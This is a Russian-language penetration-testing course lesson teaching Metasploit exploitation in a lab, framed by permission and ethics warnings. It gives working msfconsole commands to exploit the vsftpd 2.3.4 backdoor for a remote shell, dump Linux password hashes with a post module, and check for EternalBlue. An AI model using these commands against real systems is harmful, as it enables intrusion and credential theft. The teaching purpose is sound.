Эксплуатация известной уязвимости
Используйте модуль эксплойта против уязвимой цели в лаборатории и анализируйте вывод сеанса.
«Эксплуатация известной уязвимости» — бесплатный урок Cyber Security Academy на CoddyKit. Это урок 2 из 4. Ты можешь прочитать весь урок бесплатно ниже — а потом практиковать его прямо в браузере с встроенным редактором кода и ИИ-репетитором 24/7. Это часть пути обучения Cyber Security Academy, и твой прогресс синхронизируется между веб-версией и приложением CoddyKit. Курс Cyber Security Academy содержит 4 уроков всего.
Сначала этика и разрешение
Эксплуатация разрешена только против систем, которыми вы владеете или на проверку которых у вас есть явное письменное разрешение. Все приведённые здесь примеры предназначены для санкционированных лабораторных сред. Несанкционированная эксплуатация является уголовным преступлением.
Рекомендации по настройке лаборатории
Используйте намеренно уязвимые виртуальные машины: Metasploitable2/3, DVWA, машины VulnHub или HackTheBox/TryHackMe для законной практики. Никогда не проводите проверки в производственных системах или реальных системах без подписанного документа с согласованными границами работ.
# Download Metasploitable2
# https://sourceforge.net/projects/metasploitable/
# Or use VulnHub
# https://www.vulnhub.com/
# Network: host-only adapter (isolated)Разведка перед эксплуатацией
Всегда собирайте сведения перед эксплуатацией. Узнайте точную версию службы, OS и контекст, прежде чем выбирать эксплойт. Неправильная версия означает неудачный эксплойт или сбой системы.
sudo nmap -sV -O 192.168.1.100
# Identify:
# - OS version
# - Service + exact version
# - Open ports
# Then search Metasploit for matching exploitВыбор подходящего эксплойта
Выполняйте поиск по имени и версии службы. Предпочитайте модули с рейтингом Excellent или Great. Прочитайте info, чтобы убедиться, что целевая платформа и диапазон версий совпадают.
msf6 > search vsftpd 2.3.4
# exploit/unix/ftp/vsftpd_234_backdoor
# Rank: Excellent
msf6 > info exploit/unix/ftp/vsftpd_234_backdoorНастройка и запуск эксплойта
Задайте RHOSTS (удалённая цель), LHOST (ваш IP для обратных подключений), LPORT (порт прослушивания), выберите полезную нагрузку и запустите её. Следите за созданием сеанса или сообщениями об ошибках.
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > set RHOSTS 192.168.1.100
msf6 > set payload cmd/unix/interact
msf6 > run
# [*] Command shell session 1 openedИнтерпретация результатов
Успешный эксплойт открывает сеанс. При неудачном эксплойте отображаются сообщения об ошибках: соединение отклонено (порт закрыт), эксплойт не сработал (неправильная версия), сеанс не создан (полезной нагрузке не удалось подключиться обратно).
# Success:
[*] Started reverse TCP handler
[*] Command shell session 1 opened
# Failure:
[-] Exploit aborted: Bad return value from check
[-] Exploit failed: No session was createdВзаимодействие с сеансом
После эксплуатации взаимодействуйте с сеансом с помощью sessions -i . Обычные сеансы командной оболочки предоставляют терминал, а сеансы Meterpreter — расширенный API.
msf6 > sessions # list all sessions
msf6 > sessions -i 1 # interact with session 1
# Once inside:
id
whoami
ifconfig
uname -aФоновый режим и несколько сеансов
Нажмите Ctrl+Z, чтобы перевести сеанс в фоновый режим и вернуться в msfconsole. Это позволяет управлять несколькими сеансами или запускать модули постэксплуатации для определённого сеанса.
# Background active session
Ctrl+Z
# List sessions
msf6 > sessions
# Run post module against session 1
msf6 > use post/linux/gather/hashdump
msf6 > set SESSION 1
msf6 > runКоманда проверки
Во многих модулях эксплойтов есть команда check, которая проверяет уязвимость цели, не выполняя сам эксплойт. Если такая команда доступна, всегда сначала запускайте её.
msf6 exploit(ms17_010_eternalblue) > check
# [+] 192.168.1.100:445 - The target is vulnerable.
# Or:
# [-] 192.168.1.100:445 - The target is not vulnerable.Факторы надёжности эксплойтов
Эксплойты могут привести к сбою служб, вызвать срабатывание оповещений или оставить журналы. При проверках производственных систем запускайте эксплойты в периоды низкой нагрузки, подготовьте план отката и убедитесь в наличии резервных копий, прежде чем выполнять потенциально разрушительные действия.
Документирование эксплуатации
Записывайте время, IP-адрес и порт цели, использованный модуль эксплойта, номер CVE, использованную полезную нагрузку, полученный сеанс и подтверждение (снимок экрана или вывод терминала). Это доказательство уязвимости для отчёта.
Быстрая проверка
Что делает команда Metasploit «check»?
Итоги: эксплуатация уязвимостей
Этичная эксплуатация следует чёткому процессу: получите письменное разрешение, тщательно соберите сведения, выберите подходящий эксплойт, прочитайте информацию о модуле, при наличии сначала выполните проверку, запустите эксплойт и всё задокументируйте. Никогда не выполняйте эксплуатацию без разрешения — технические навыки и этические границы неразделимы.
Часто задаваемые вопросы
Урок «Эксплуатация известной уязвимости» бесплатный?
Да — полный текст урока «Эксплуатация известной уязвимости» бесплатно доступен здесь в веб-версии. Чтобы практиковать его интерактивно (встроенный редактор кода и ИИ-репетитор 24/7) и разблокировать остальной курс Cyber Security Academy, подпишись на CoddyKit PRO. Курс Cyber Security Academy содержит 4 уроков всего.
Чему я научусь в уроке «Эксплуатация известной уязвимости»?
Используйте модуль эксплойта против уязвимой цели в лаборатории и анализируйте вывод сеанса. Ты практикуешь Cyber Security Academy с помощью реального кода, который запускаешь прямо в браузере, и ИИ-репетитор 24/7 отвечает на твои вопросы во время урока.
Нужен ли мне опыт, чтобы начать Cyber Security Academy?
Предыдущий опыт не требуется. Cyber Security Academy на CoddyKit структурирован для всех уровней — от новичков до продвинутых, поэтому ты можешь начать отсюда или с самого начала и учиться в своем темпе. Это урок 2 из 4.
Сколько времени занимает урок «Эксплуатация известной уязвимости»?
Большинство уроков CoddyKit занимают около 5–10 минут. Каждый из них компактный и интерактивный, поэтому ты постоянно делаешь прогресс и продолжаешь с того же места в веб-версии и приложении.
Можно ли писать и запускать код в этом уроке Cyber Security Academy?
Да. Каждый урок Cyber Security Academy включает встроенный редактор кода, поэтому ты пишешь и запускаешь реальный код прямо в браузере и получаешь моментальную обратную связь от AI — локальная установка не требуется.
Все уроки этого курса
- Архитектура Metasploit и msfconsole
- Эксплуатация известной уязвимости
- Полезные нагрузки: поэтапные и цельные, Meterpreter
- Постэксплуатация: перемещение и закрепление